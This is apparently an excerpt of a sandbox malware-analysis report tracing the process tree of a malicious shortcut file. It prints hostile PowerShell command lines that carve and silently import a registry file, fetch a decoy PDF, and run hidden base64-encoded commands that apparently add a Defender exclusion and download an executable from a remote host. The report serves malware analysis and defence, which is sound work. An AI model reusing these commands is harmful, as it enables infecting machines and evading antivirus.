                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:11:19:12
                                                        Start date:02/02/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-Location -Path '"C:\Users\user\Desktop"' ;$dirPath = Get-Location;Set-Location -Path '""' ;$lnkpaths = Get-ChildItem -Path '""' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public '17399.reg';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath 'regedit' -ArgumentList '/s', $exePath;$a='http://files.catbox.moe/p1yr9i.pdf';$d=$env:TEMP + '\Document.pdf';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d
                                                        Imagebase:0x7ff788560000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:11:19:12
                                                        Start date:02/02/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:11:19:15
                                                        Start date:02/02/2024
                                                        Path:C:\Windows\regedit.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\regedit.exe" /s C:\Users\Public\17399.reg
                                                        Imagebase:0x7ff7a6dd0000
                                                        File size:370'176 bytes
                                                        MD5 hash:999A30979F6195BF562068639FFC4426
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:11:19:17
                                                        Start date:02/02/2024
                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\Document.pdf
                                                        Imagebase:0x7ff6bc1b0000
                                                        File size:5'641'176 bytes
                                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:6
                                                        Start time:11:19:17
                                                        Start date:02/02/2024
                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                        Imagebase:0x7ff74bb60000
                                                        File size:3'581'912 bytes
                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:7
                                                        Start time:11:19:18
                                                        Start date:02/02/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:8
                                                        Start time:11:19:18
                                                        Start date:02/02/2024
                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1720,i,67177622323241092,908084778299603848,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                        Imagebase:0x7ff74bb60000
                                                        File size:3'581'912 bytes
                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:10
                                                        Start time:11:19:26
                                                        Start date:02/02/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA
                                                        Imagebase:0x7ff788560000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:11
                                                        Start time:11:19:26
                                                        Start date:02/02/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:16
                                                        Start time:11:19:35
                                                        Start date:02/02/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABhAD0AJwBoAHQAdABwADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBNAHkAUAByAGkAbgBjAGUAcwBzAEEAawBpAHIAYQAvAEoAYQByAHYAYQBzAC8AbQBhAGkAbgAvAEEAbABlAGoALgBlAHgAZQAnADsAJABkAD0AIgAkACgAJABlAG4AdgA6AFQARQB
                                                        Imagebase:0x7ff788560000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:17
                                                        Start time:11:19:35
                                                        Start date:02/02/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Reset < >
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1804027978.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b940000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                          • Instruction ID: cd85b3c89f0650b1f2eb9b31fe8c2a4b932dd1eb5c1be7cad5cf12c3024315c6
                                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                          • Instruction Fuzzy Hash: 9B01677121CB0C4FDB48EF0CE451AA9B7E0FB95364F10056DE58AC36A5D636E881CB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%